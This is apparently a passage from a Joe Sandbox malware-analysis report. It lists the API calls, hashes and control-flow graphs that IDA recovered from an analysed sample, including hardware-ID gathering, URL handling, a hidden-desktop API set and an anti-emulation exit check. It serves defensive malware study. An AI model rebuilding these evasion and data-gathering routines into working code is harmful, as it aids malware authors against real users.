                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                                • API String ID: 2238633743-3468015613
                                • Opcode ID: 59d1e1653723303d13cc65e0eedf2755ecc8c30ab45132ee49e37af973c237ca
                                • Instruction ID: 0767b995d8f2b61ad4ba9d3cdeeb00c96af6574ad468854168c4e13b17f1584b
                                • Opcode Fuzzy Hash: 59d1e1653723303d13cc65e0eedf2755ecc8c30ab45132ee49e37af973c237ca
                                • Instruction Fuzzy Hash: 96626FB5610224BFDB74DF64F88CE2E37F9F788205B50A919EA559325CDB389980DF20
                                APIs
                                • lstrlen.KERNEL32(0101CFEC), ref: 0100F1D5
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F1F1
                                • lstrlen.KERNEL32(0101CFEC), ref: 0100F1FC
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F215
                                • lstrlen.KERNEL32(0101CFEC), ref: 0100F220
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F239
                                • lstrcpy.KERNEL32(00000000,01024FA0), ref: 0100F25E
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F28C
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F2C0
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100F2F0
                                • lstrlen.KERNEL32(00D560D8), ref: 0100F315
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: f24846ba38e7ff21c6766a6feeec6add1e85734c3cc17c8eb6ca87ddfead52a6
                                • Instruction ID: 4b72aa85a80f524374ddd3f7d2f2c90fd8d9b40a765c900a97d6fa90a962d69e
                                • Opcode Fuzzy Hash: f24846ba38e7ff21c6766a6feeec6add1e85734c3cc17c8eb6ca87ddfead52a6
                                • Instruction Fuzzy Hash: 45A2B4309012069FEBB2DF69D849A6EBBF4BF44304F1880ADE989DB395DB35D841DB50
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010013
                                • lstrlen.KERNEL32(0101CFEC), ref: 010100BD
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010100E1
                                • lstrlen.KERNEL32(0101CFEC), ref: 010100EC
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010110
                                • lstrlen.KERNEL32(0101CFEC), ref: 0101011B
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0101013F
                                • lstrlen.KERNEL32(0101CFEC), ref: 0101015A
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010189
                                • lstrlen.KERNEL32(0101CFEC), ref: 01010194
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010101C3
                                • lstrlen.KERNEL32(0101CFEC), ref: 010101CE
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010206
                                • lstrlen.KERNEL32(0101CFEC), ref: 01010250
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 01010288
                                • lstrcpy.KERNEL32(00000000,?), ref: 0101059B
                                • lstrlen.KERNEL32(00D563D8), ref: 010105AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 010105D7
                                • lstrcat.KERNEL32(00000000,?), ref: 010105E3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0101060E
                                • lstrlen.KERNEL32(00D6ED18), ref: 01010625
                                • lstrcpy.KERNEL32(00000000,?), ref: 0101064C
                                • lstrcat.KERNEL32(00000000,?), ref: 01010658
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01010681
                                • lstrlen.KERNEL32(00D562F8), ref: 01010698
                                • lstrcpy.KERNEL32(00000000,?), ref: 010106C9
                                • lstrcat.KERNEL32(00000000,?), ref: 010106D5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 01010706
                                • lstrcpy.KERNEL32(00000000,00D68BD0), ref: 0101074B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1557
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF1579
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF159B
                                  • Part of subcall function 00FF1530: lstrcpy.KERNEL32(00000000,?), ref: 00FF15FF
                                • lstrcpy.KERNEL32(00000000,?), ref: 0101077F
                                • lstrcpy.KERNEL32(00000000,00D6ED90), ref: 010107E7
                                • lstrcpy.KERNEL32(00000000,00D68920), ref: 01010858
                                • lstrcpy.KERNEL32(00000000,fplugins), ref: 010108CF
                                • lstrcpy.KERNEL32(00000000,?), ref: 01010928
                                • lstrcpy.KERNEL32(00000000,00D68980), ref: 010109F8
                                  • Part of subcall function 00FF24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FF2528
                                  • Part of subcall function 00FF24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FF254E
                                  • Part of subcall function 00FF24E0: lstrcpy.KERNEL32(00000000,?), ref: 00FF2577
                                • lstrcpy.KERNEL32(00000000,00D68810), ref: 01010ACE
                                • lstrcpy.KERNEL32(00000000,?), ref: 01010B81
                                • lstrcpy.KERNEL32(00000000,00D68810), ref: 01010D58
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat
                                • String ID: fplugins
                                • API String ID: 2500673778-38756186
                                • Opcode ID: 85f988a4e413cd001c4d2414fa88e5679d53a61e37b06d2bb22a5e302ee02a39
                                • Instruction ID: c219af4575d0e541cd868e280b23150e3388005909450f43512ef92efd3ff6f4
                                • Opcode Fuzzy Hash: 85f988a4e413cd001c4d2414fa88e5679d53a61e37b06d2bb22a5e302ee02a39
                                • Instruction Fuzzy Hash: 5AE260709053418FD774DF29C488B6ABBE0BF88314F5885ADE6CD8B25ADB39D845CB42
                                APIs
                                • lstrlen.KERNEL32(00D560D8), ref: 0100F315
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F3A3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F3C7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F47B
                                • lstrcpy.KERNEL32(00000000,00D560D8), ref: 0100F4BB
                                • lstrcpy.KERNEL32(00000000,00D68BB0), ref: 0100F4EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F59E
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0100F61C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F64C
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F69A
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 0100F718
                                • lstrlen.KERNEL32(00D68A40), ref: 0100F746
                                • lstrcpy.KERNEL32(00000000,00D68A40), ref: 0100F771
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100F793
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100F7E4
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 0100FA32
                                • lstrlen.KERNEL32(00D68BC0), ref: 0100FA60
                                • lstrcpy.KERNEL32(00000000,00D68BC0), ref: 0100FA8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100FAAD
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100FAFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: ERROR
                                • API String ID: 367037083-2861137601
                                • Opcode ID: 44493a5f8b0c89fdbab479667d78edb4ac55b2651ccc43fab31325ce4bae3976
                                • Instruction ID: 8b75ac733ad5a3ac25f010afc55e1336571049214b2bd234aa3449d6bcd0388a
                                • Opcode Fuzzy Hash: 44493a5f8b0c89fdbab479667d78edb4ac55b2651ccc43fab31325ce4bae3976
                                • Instruction Fuzzy Hash: 4CF17F70A01202DFEBB6CF29D448A29BBE5BF44314F28C0ADD949DB396D735D882DB41

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2382 1008ca0-1008cc4 StrCmpCA 2383 1008cc6-1008cc7 ExitProcess 2382->2383 2384 1008ccd-1008ce6 2382->2384 2386 1008ee2-1008eef call ff2a20 2384->2386 2387 1008cec-1008cf1 2384->2387 2388 1008cf6-1008cf9 2387->2388 2390 1008ec3-1008edc 2388->2390 2391 1008cff 2388->2391 2390->2386 2428 1008cf3 2390->2428 2393 1008d84-1008d92 StrCmpCA 2391->2393 2394 1008da4-1008db8 StrCmpCA 2391->2394 2395 1008d06-1008d15 lstrlen 2391->2395 2396 1008e88-1008e9a lstrlen 2391->2396 2397 1008e6f-1008e7d StrCmpCA 2391->2397 2398 1008d30-1008d3f lstrlen 2391->2398 2399 1008e56-1008e64 StrCmpCA 2391->2399 2400 1008d5a-1008d69 lstrlen 2391->2400 2401 1008dbd-1008dcb StrCmpCA 2391->2401 2402 1008ddd-1008deb StrCmpCA 2391->2402 2403 1008dfd-1008e0b StrCmpCA 2391->2403 2404 1008e1d-1008e2b StrCmpCA 2391->2404 2405 1008e3d-1008e4b StrCmpCA 2391->2405 2393->2390 2409 1008d98-1008d9f 2393->2409 2394->2390 2414 1008d17-1008d1c call ff2a20 2395->2414 2415 1008d1f-1008d2b call ff2930 2395->2415 2419 1008ea4-1008eb0 call ff2930 2396->2419 2420 1008e9c-1008ea1 call ff2a20 2396->2420 2397->2390 2418 1008e7f-1008e86 2397->2418 2421 1008d41-1008d46 call ff2a20 2398->2421 2422 1008d49-1008d55 call ff2930 2398->2422 2399->2390 2417 1008e66-1008e6d 2399->2417 2406 1008d73-1008d7f call ff2930 2400->2406 2407 1008d6b-1008d70 call ff2a20 2400->2407 2401->2390 2410 1008dd1-1008dd8 2401->2410 2402->2390 2411 1008df1-1008df8 2402->2411 2403->2390 2412 1008e11-1008e18 2403->2412 2404->2390 2413 1008e31-1008e38 2404->2413 2405->2390 2416 1008e4d-1008e54 2405->2416 2440 1008eb3-1008eb5 2406->2440 2407->2406 2409->2390 2410->2390 2411->2390 2412->2390 2413->2390 2414->2415 2415->2440 2416->2390 2417->2390 2418->2390 2419->2440 2420->2419 2421->2422 2422->2440 2428->2388 2440->2390 2441 1008eb7-1008eb9 2440->2441 2441->2390 2442 1008ebb-1008ebd lstrcpy 2441->2442 2442->2390
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 41063e7337760e0534208fba7f99e0ad756fede793dbeee56a4e2b98a2212ef6
                                • Instruction ID: b894ed4f2d2caf97b786786a3ab6df014c6f7c7fa0c2f46b6c0ec528d19456cb
                                • Opcode Fuzzy Hash: 41063e7337760e0534208fba7f99e0ad756fede793dbeee56a4e2b98a2212ef6
                                • Instruction Fuzzy Hash: 93518130D04759ABEB729F69D888A2F7BF4BF04704F00D85EE582D7651D778D9829B10

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2443 1012740-1012783 GetWindowsDirectoryA 2444 1012785 2443->2444 2445 101278c-10127ea GetVolumeInformationA 2443->2445 2444->2445 2446 10127ec-10127f2 2445->2446 2447 10127f4-1012807 2446->2447 2448 1012809-1012820 GetProcessHeap RtlAllocateHeap 2446->2448 2447->2446 2449 1012822-1012824 2448->2449 2450 1012826-1012844 wsprintfA 2448->2450 2451 101285b-1012872 call 10171e0 2449->2451 2450->2451
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 0101277B
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,010093B6,00000000,00000000,00000000,00000000), ref: 010127AC
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0101280F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012816
                                • wsprintfA.USER32 ref: 0101283B
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                                • String ID: :\$C
                                • API String ID: 2572753744-3309953409
                                • Opcode ID: a682560d73238366b04cf33025f61e69c28cc6c542fce221183edb1a6b04553c
                                • Instruction ID: fe6962c043318cfb415ba471e5986e99486cf54bbb51f1a46b4841c171ed6da8
                                • Opcode Fuzzy Hash: a682560d73238366b04cf33025f61e69c28cc6c542fce221183edb1a6b04553c
                                • Instruction Fuzzy Hash: 93316FB1905219ABCB14CFB89989AEFBFBCFF58710F104169E545E7644E6348A408BA1

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2454 ff4bc0-ff4bce 2455 ff4bd0-ff4bd5 2454->2455 2455->2455 2456 ff4bd7-ff4c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call ff2a20 2455->2456
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00FF4BF7
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FF4C01
                                • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00FF4C0B
                                • lstrlen.KERNEL32(?,00000000,?), ref: 00FF4C1F
                                • InternetCrackUrlA.WININET(?,00000000), ref: 00FF4C27
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1683549937-4251816714
                                • Opcode ID: cc0eca2de563f5376aa7dc7056ad84b2e59f80715e7c38e5bf8a977a25b75c79
                                • Instruction ID: 0a26ee8e5159efeedc5de88437deb2645b53dd8c49329a449f2cf095e2ca82aa
                                • Opcode Fuzzy Hash: cc0eca2de563f5376aa7dc7056ad84b2e59f80715e7c38e5bf8a977a25b75c79
                                • Instruction Fuzzy Hash: 1D012171D00218ABDB14DFA8E845B9EBBF8EF44320F004126FA54E7390DB7499048FD4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2459 ff1030-ff1055 GetCurrentProcess VirtualAllocExNuma 2460 ff105e-ff107b VirtualAlloc 2459->2460 2461 ff1057-ff1058 ExitProcess 2459->2461 2462 ff107d-ff1080 2460->2462 2463 ff1082-ff1088 2460->2463 2462->2463 2464 ff108a-ff10ab VirtualFree 2463->2464 2465 ff10b1-ff10b6 2463->2465 2464->2465
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF104D
                                • ExitProcess.KERNEL32 ref: 00FF1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FF106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00FF10AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: ace0611ac2f660848f8c199db024b7a3e4fca8e6a930eca97039406944d4460f
                                • Instruction ID: 500183b3d4e9e7e6c11a2a192b6ee0c8652d30cc915a12ebdd35f8ff9efbd0de
                                • Opcode Fuzzy Hash: ace0611ac2f660848f8c199db024b7a3e4fca8e6a930eca97039406944d4460f
                                • Instruction Fuzzy Hash: BD01D171740218BBEB304A656C1EF6A77A9AB84B19F209018F708E7280D9B5EA009A64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2466 100ee90-100eeb5 call ff2930 2469 100eeb7-100eebf 2466->2469 2470 100eec9-100eecd call ff6c40 2466->2470 2469->2470 2471 100eec1-100eec3 lstrcpy 2469->2471 2473 100eed2-100eee8 StrCmpCA 2470->2473 2471->2470 2474 100ef11-100ef18 call ff2a20 2473->2474 2475 100eeea-100ef02 call ff2a20 call ff2930 2473->2475 2480 100ef20-100ef28 2474->2480 2485 100ef04-100ef0c 2475->2485 2486 100ef45-100efa0 call ff2a20 * 10 2475->2486 2480->2480 2482 100ef2a-100ef37 call ff2930 2480->2482 2482->2486 2490 100ef39 2482->2490 2485->2486 2489 100ef0e-100ef0f 2485->2489 2492 100ef3e-100ef3f lstrcpy 2489->2492 2490->2492 2492->2486
                                APIs
